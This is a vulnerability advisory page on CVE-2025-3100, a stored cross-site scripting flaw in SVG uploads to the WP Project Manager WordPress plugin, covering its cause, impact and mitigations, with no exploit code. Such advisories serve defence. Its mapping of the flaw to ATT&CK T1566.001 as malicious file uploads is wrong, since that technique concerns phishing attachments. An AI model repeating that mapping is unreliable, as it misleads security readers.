CVE-2025-3100 in WP Project Manager Plugin
Summary
by MITRE • 04/09/2025
The WP Project Manager – Task, team, and project management plugin featuring kanban board and gantt charts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 2.6.22 due to insufficient input sanitization and output escaping in tasks discussion. This makes it possible for authenticated attackers, with Subscriber-level access and above, and permissions granted by an Administrator, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.
Statistical analysis made it clear that VulDB provides the best quality for vulnerability data.
Analysis
by VulDB Data Team • 04/09/2025
The vulnerability identified as CVE-2025-3100 affects the WP Project Manager plugin for WordPress, a widely used project management solution that includes features such as kanban boards and gantt charts. This plugin has been found to contain a stored cross-site scripting flaw that exists in all versions up to and including 2.6.22. The vulnerability stems from inadequate input sanitization and output escaping mechanisms specifically within the tasks discussion functionality where SVG file uploads are processed. The flaw allows authenticated attackers who possess at least subscriber-level access to the WordPress installation to execute malicious scripts through SVG file uploads that persist on the server and are later executed when users view these files.
The technical nature of this vulnerability aligns with CWE-79, which represents Cross-Site Scripting, and specifically demonstrates how insufficient input validation and output escaping creates opportunities for persistent script injection attacks. The vulnerability occurs because the plugin fails to properly sanitize SVG file content before storing it in the database, and does not implement adequate output escaping when rendering these files. This creates a scenario where an attacker with minimal privileges can upload a malicious SVG file containing embedded JavaScript code that will execute in the context of other users' browsers when they access the file. The attack vector is particularly concerning because SVG files are often treated as safe content and may bypass typical security filters that would otherwise block script execution.
The operational impact of this vulnerability extends beyond simple script execution as it represents a serious privilege escalation risk within the WordPress environment. Attackers who gain subscriber-level access can leverage this vulnerability to perform actions such as stealing user sessions, redirecting users to malicious sites, or even executing more sophisticated attacks like credential harvesting. The stored nature of the XSS means that the malicious scripts remain persistent on the server and will execute for any user who accesses the compromised SVG files, making it particularly dangerous for collaborative environments where multiple users interact with project management data. This vulnerability undermines the security model of the WordPress platform by allowing low-privilege attackers to potentially compromise higher-privilege users through the project management plugin interface.
Mitigation strategies for CVE-2025-3100 should include immediate patching to the latest version of the WP Project Manager plugin where the vulnerability has been addressed through proper input sanitization and output escaping mechanisms. Organizations should also implement additional security measures such as restricting file upload capabilities to only trusted administrators, implementing Content Security Policy headers to limit script execution, and conducting regular security audits of uploaded files. The vulnerability demonstrates the importance of proper input validation and output escaping as outlined in the OWASP Top Ten security principles and aligns with ATT&CK technique T1566.001 for Initial Access through malicious file uploads. Security teams should also consider implementing file type restrictions and content validation for SVG files specifically, as these files can contain embedded scripts that bypass traditional security measures. Regular monitoring of plugin updates and maintaining awareness of security advisories for third-party WordPress plugins remains critical for preventing exploitation of similar vulnerabilities in the future.